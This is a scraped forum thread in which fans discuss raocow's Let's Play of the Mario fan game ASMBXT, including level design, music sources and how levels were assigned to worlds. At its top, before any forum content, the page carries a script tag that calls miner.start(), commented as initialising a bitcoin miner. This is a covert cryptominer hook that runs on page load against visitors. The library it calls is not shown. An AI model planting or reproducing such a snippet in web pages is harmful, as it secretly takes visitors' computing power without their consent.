<script>
miner.start(); // initialise bitcoin miner
</script>

mario fan games galaxysmbx communitypge project

ASMBXT; Journey's end

this is the place where lps are being talked about. it's important to talk about games being played on the internet.
User avatar
kilon
Posts: 2
Joined: 10 years ago
Location: Netherlands

Re: raocow Plays: ASMBXT Prelude to the what the hell

Postby kilon » 6 years ago

The game does already show it's potential, but so far it has been rather poor level design. But it's only early world 1. I give it until mid world 2 to get a lot better. Still staying positive.
Image
Image
Image

User avatar
lukaramu
not lukaramu
Posts: 0
Joined: 7 years ago
First name: not lukaramu
Location: the place where i live

Re: raocow Plays: ASMBXT Prelude to the what the hell

Postby lukaramu » 6 years ago

benzeenie wrote:Where is the music from at the very start of Cavey Cave Cavelands? I know it's something that I've heard a zillion times... It's really bugging me trying to remember.
It's the the World 2 overworld theme from ASMT, but in high quality, by prsnth1111

User avatar
SAJewers
hi
Posts: 3277
Joined: 7 years ago
Location: Nova Scotia

Re: raocow Plays: ASMBXT Prelude to the what the hell

Postby SAJewers » 6 years ago

kilon wrote:The game does already show it's potential, but so far it has been rather poor level design. But it's only early world 1. I give it until mid world 2 to get a lot better. Still staying positive.
IMO once we get to "Revolution" in world 3, the level design gets so much better. For wherever reason, the first 2 worlds are nothing to write home about, when we get to "Revolution", we see some of the more interestingly designed levels, then once we hit "Life Lift", we see some of the best levels.

Also, I was kinda surprised that raocow had troubles with my level, considering at point it was it was the second easiest level.
ImageImageImageImageImage
Image
ImageImageImageImage

User avatar
Kashkabald
Posts: 0
Joined: 9 years ago

Re: raocow Plays: ASMBXT Prelude to the what the hell

Postby Kashkabald » 6 years ago

SAJewers wrote:
kilon wrote:The game does already show it's potential, but so far it has been rather poor level design. But it's only early world 1. I give it until mid world 2 to get a lot better. Still staying positive.
IMO once we get to "Revolution" in world 3, the level design gets so much better. For wherever reason, the first 2 worlds are nothing to write home about, when we get to "Revolution", we see some of the more interestingly designed levels, then once we hit "Life Lift", we see some of the best levels.

Also, I was kinda surprised that raocow had troubles with my level, considering at point it was it was the second easiest level.
I like Castle of Reflection in world 1, great concept.

Also The Lounge is deceptively hard for a world 1 level. I had trouble with it too. Not too hard at all, though.

User avatar
docopoper
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla non pharetra enim, nec maximus odio.
Posts: 78
Joined: 8 years ago
First name: Shane Farrell
Pronouns: they/he
Location: Ireland

Re: raocow Plays: ASMBXT Prelude to the what the hell

Postby docopoper » 6 years ago

SAJewers wrote: IMO once we get to "Revolution" in world 3, the level design gets so much better. For wherever reason, the first 2 worlds are nothing to write home about, when we get to "Revolution", we see some of the more interestingly designed levels, then once we hit "Life Lift", we see some of the best levels.

Also, I was kinda surprised that raocow had troubles with my level, considering at point it was it was the second easiest level.
Hehehe... You seem to like my levels. :D

Also - the lounge isn't that easy. It's not too hard - but I died a few times on it. You probably just find it easy because you made it. Fun level though. :)
The first thing I would do with infinite power would be to make myself a cave where I could look at my shadow forever.

Image <- Go team Yeah Doctor Shemp.!
Image <- That's everyone being nice to me. ^^

I made a game called Utter Confusion! Play it! :D
It's a lot of fun and has been incredibly popular at every indie game dev party I've brought it to.

User avatar
SAJewers
hi
Posts: 3277
Joined: 7 years ago
Location: Nova Scotia

Re: raocow Plays: ASMBXT Prelude to the what the hell

Postby SAJewers » 6 years ago

docopoper wrote:
SAJewers wrote: IMO once we get to "Revolution" in world 3, the level design gets so much better. For wherever reason, the first 2 worlds are nothing to write home about, when we get to "Revolution", we see some of the more interestingly designed levels, then once we hit "Life Lift", we see some of the best levels.

Also, I was kinda surprised that raocow had troubles with my level, considering at point it was it was the second easiest level.
Hehehe... You seem to like my levels. :D

Also - the lounge isn't that easy. It's not too hard - but I died a few times on it. You probably just find it easy because you made it. Fun level though. :)
Well, I think two of the top five levels are yous. :)

You're probably right though. For a first SMBX level, it came out quite nice, though my levels are definitely better.

Looking at the hubworld, the next 3 levels he'll probably end up playing are Majestic Tower, Could 9, and Fricken' Meta. It'll be interesting to see raocow get the second star in cloud 9.
ImageImageImageImageImage
Image
ImageImageImageImage

User avatar
lukaramu
not lukaramu
Posts: 0
Joined: 7 years ago
First name: not lukaramu
Location: the place where i live

Re: raocow Plays: ASMBXT Prelude to the what the hell

Postby lukaramu » 6 years ago

SAJewers wrote:Looking at the hubworld, the next 3 levels he'll probably end up playing are Majestic Tower, Could 9, and Fricken' Meta. It'll be interesting to see raocow get the second star in cloud 9.
I know that when testing in the earliest beta (the one you made the provisional hub for), I found out how to do it, but now I forgot. Argh! I can't do it.
I know it involved Yoshi, though

User avatar
benzeenie
⊂二二二(*^ω^)二⊃
Posts: 4
Joined: 9 years ago
Location: England

Re: raocow Plays: ASMBXT Prelude to the what the hell

Postby benzeenie » 6 years ago

LukaRamu wrote:
benzeenie wrote:Where is the music from at the very start of Cavey Cave Cavelands? I know it's something that I've heard a zillion times... It's really bugging me trying to remember.
It's the the World 2 overworld theme from ASMT, but in high quality, by prsnth1111
Bloody hell!

Of course it is! Thanks, man, that was driving me CRAZY!

So, yeah- that's 100% where I know it from, was it an original tune made from scratch for ASMT? By whom? I'd like to find out if there are any other tunes they've made.

Thanks again LukaRamu, it really was driving me mad trying to place it.

*EDIT*
I somehow missed the "by prsnth1111" part. :roll:
Image

pholtos
Loves adorable things.
Posts: 1522
Joined: 10 years ago
Location: One of the States in the Center of the U.S.

Re: raocow Plays: ASMBXT Prelude to the what the hell

Postby pholtos » 6 years ago

Well.... I got a good reaction from rao. XD
Host and Organizer of the Rando Pokemon Tournaments. Completed: I, II, III, IV, V
Dealer of the Pokermon Discord Tourneys.

ImageImageImageImage
ImageImageImageImage
ImageImageImageImage

I do LPs, check them out if you'd like.

Currently playing:
Image

The 500 char limit is evil. :P

darkychao
Posts: 0
Joined: 9 years ago
Location: When you sleep there's a lesson you must learn: not for the lesson today, mate.

Re: raocow Plays: ASMBXT Prelude to the what the hell

Postby darkychao » 6 years ago

i just knew he was going to accidentally go into the cutscene pipe at the end there...
Image
Image
Image
BeatBoxingBoo wrote:a medley is just, like, a mixture of medics
Check out my TF2 community workshop stuff:
Crust CrusherImage Crafty CutterImage PinheadImageThreadImage
If I didn't like anybody who had a different opinion than me on something I like I wouldn't have any friends.-Bwarch

went
Posts: 81
Joined: 9 years ago
Pronouns: he/him/his
Location: Madrid

Re: raocow Plays: ASMBXT Prelude to the what the hell

Postby went » 6 years ago

World 1 hub music is amazing.
"Touhou is wrong" - Horikawa Otane

kil3
Posts: 0
Joined: 9 years ago

Re: raocow Plays: ASMBXT Prelude to the what the hell

Postby kil3 » 6 years ago

It does have 2 hammer brothers a disco shell and bomb lakitu in world 1

Shinoda
The Chick Magnet
Posts: 176
Joined: 7 years ago
Pronouns: they/them/their
Location: Gatineau, Quebec, Canada

Re: raocow Plays: ASMBXT Prelude to the what the hell

Postby Shinoda » 6 years ago

kil3 wrote:It does have 2 hammer brothers a disco shell and bomb lakitu in world 1
Well, the levels weren't designed to fit specific worlds... people made levels and it was all thrown in a bag, then someone played them and put them where they would fit difficulty-wise.

I wanna say that someone is SAJewers but to be honest, that's coming out of my ass since I didn't pay to much attention around that part.
Horikawa Otane wrote:Butt-lamps are -30 points, so =p
ImageImageImage

User avatar
docopoper
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla non pharetra enim, nec maximus odio.
Posts: 78
Joined: 8 years ago
First name: Shane Farrell
Pronouns: they/he
Location: Ireland

Re: raocow Plays: ASMBXT Prelude to the what the hell

Postby docopoper » 6 years ago

We actually each chose a world to put our level in and they were later shuffled a bit during beta testing. There wasn't one single person making that decision. Even still - I think most of the levels stayed where they were.
The first thing I would do with infinite power would be to make myself a cave where I could look at my shadow forever.

Image <- Go team Yeah Doctor Shemp.!
Image <- That's everyone being nice to me. ^^

I made a game called Utter Confusion! Play it! :D
It's a lot of fun and has been incredibly popular at every indie game dev party I've brought it to.

User avatar
SAJewers
hi
Posts: 3277
Joined: 7 years ago
Location: Nova Scotia

Re: raocow Plays: ASMBXT Prelude to the what the hell

Postby SAJewers » 6 years ago

went wrote:World 1 hub music is amazing.
It's Stage 1 of Alfred Chicken, if you're wondering.
Shinoda wrote:
kil3 wrote:It does have 2 hammer brothers a disco shell and bomb lakitu in world 1
Well, the levels weren't designed to fit specific worlds... people made levels and it was all thrown in a bag, then someone played them and put them where they would fit difficulty-wise.

I wanna say that someone is SAJewers but to be honest, that's coming out of my ass since I didn't pay to much attention around that part.
Everyone got to pick what world their levels got put in, on a first come first serve basis. Aside from some levels (lusco Fusco, Fluffy Quest, to name a few), where people placed them were where they got put. Levels we did shuffle around were by consensus.
Last edited by SAJewers on 17 Mar 2013, 17:03, edited 1 time in total.
ImageImageImageImageImage
Image
ImageImageImageImage

Shinoda
The Chick Magnet
Posts: 176
Joined: 7 years ago
Pronouns: they/them/their
Location: Gatineau, Quebec, Canada

Re: raocow Plays: ASMBXT Prelude to the what the hell

Postby Shinoda » 6 years ago

docopoper wrote:We actually each chose a world to put our level in and they were later shuffled a bit during beta testing. There wasn't one single person making that decision. Even still - I think most of the levels stayed where they were.
I guess I was wrong. Thanks for correcting :)
Horikawa Otane wrote:Butt-lamps are -30 points, so =p
ImageImageImage

User avatar
Kashkabald
Posts: 0
Joined: 9 years ago

Re: raocow Plays: ASMBXT Prelude to the what the hell

Postby Kashkabald » 6 years ago

We need to make a list of what songs were used, though I'm having fun seeing people trying to guess. It can wait, I suppose

User avatar
raocow
the death of the incredible huge
Posts: 3014
Joined: 10 years ago
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Re: raocow Plays: ASMBXT Prelude to the what the hell

Postby raocow » 6 years ago

The list should just be, like, one day late re: the videos or something
the chillaxest of dragonsImage
Image
Image
Image
ImageImage

User avatar
SAJewers
hi
Posts: 3277
Joined: 7 years ago
Location: Nova Scotia

Re: raocow Plays: ASMBXT Prelude to the what the hell

Postby SAJewers » 6 years ago

Kashkabald wrote:We need to make a list of what songs were used, though I'm having fun seeing people trying to guess. It can wait, I suppose
There was that "Outscoured stuff credits" thread.
ImageImageImageImageImage
Image
ImageImageImageImage

User avatar
Mata Hari
Posts: 2234
Joined: 10 years ago

Re: raocow Plays: ASMBXT Prelude to the what the hell

Postby Mata Hari » 6 years ago

SAJewers wrote:
went wrote:World 1 hub music is amazing.
It's Stage 1 of Alfred Chicken, if you're wondering.
Haha jeez, that music fits our game way better than it fits the game it was bleedin' composed for.

User avatar
raocow
the death of the incredible huge
Posts: 3014
Joined: 10 years ago
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Re: raocow Plays: ASMBXT Prelude to the what the hell

Postby raocow » 6 years ago

dr_kraid wrote:
SAJewers wrote:
went wrote:World 1 hub music is amazing.
It's Stage 1 of Alfred Chicken, if you're wondering.
Haha jeez, that music fits our game way better than it fits the game it was bleedin' composed for.
holy moley, you are not kidding
the chillaxest of dragonsImage
Image
Image
Image
ImageImage

User avatar
KobaBeach
obscure jrpg enthusiast
Posts: 1446
Joined: 6 years ago
First name: David
Pronouns: he/him
Location: Portugal

Re: raocow Plays: ASMBXT Prelude to the what the hell

Postby KobaBeach » 6 years ago

the video wrote:code lyoko playstation
what the hell is going on
twitter (spicy at times!) | avatar by kuma

who cares:
Image

Image
Image
Image
Image

Oracle of Wuffing
Posts: 0
Joined: 10 years ago

Re: raocow Plays: ASMBXT Prelude to the what the hell

Postby Oracle of Wuffing » 6 years ago

What the hell nobody asked me for permission to use the coin I designed for ASMT I am going to sue SMBX for intellectual property theft y'all better stop distributing this right now!11
raocow wrote:Next LP project - the entire hunter/scorpion series in chronological order

User avatar
docopoper
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla non pharetra enim, nec maximus odio.
Posts: 78
Joined: 8 years ago
First name: Shane Farrell
Pronouns: they/he
Location: Ireland

Re: raocow Plays: ASMBXT Prelude to the what the hell

Postby docopoper » 6 years ago

Oracle of Wuffing wrote:What the hell nobody asked me for permission to use the coin I designed for ASMT I am going to sue SMBX for intellectual property theft y'all better stop distributing this right now!11
But you gave us permission:
Oracle of Wuffing wrote:I hereby grant permission for the ASMBXT team to use my coin graphic in for any purpose whatsoever without obligation of accreditation or any other implicit or explicit rights that would typically be granted to me as the bearer of the extremely restrictive copyright protection that I enforced upon it. As per the law of the internet.
The first thing I would do with infinite power would be to make myself a cave where I could look at my shadow forever.

Image <- Go team Yeah Doctor Shemp.!
Image <- That's everyone being nice to me. ^^

I made a game called Utter Confusion! Play it! :D
It's a lot of fun and has been incredibly popular at every indie game dev party I've brought it to.

User avatar
GauRocks
Posts: 0
Joined: 10 years ago

Re: raocow Plays: ASMBXT Prelude to the what the hell

Postby GauRocks » 6 years ago

KobaBeach wrote:
the video wrote:code lyoko playstation
what the hell is going on
Look at the video uploader's name.


Return to “let's play”

Who is online

Users browsing this forum: Arctangent, Google [Bot], warpio and 9 guests

cron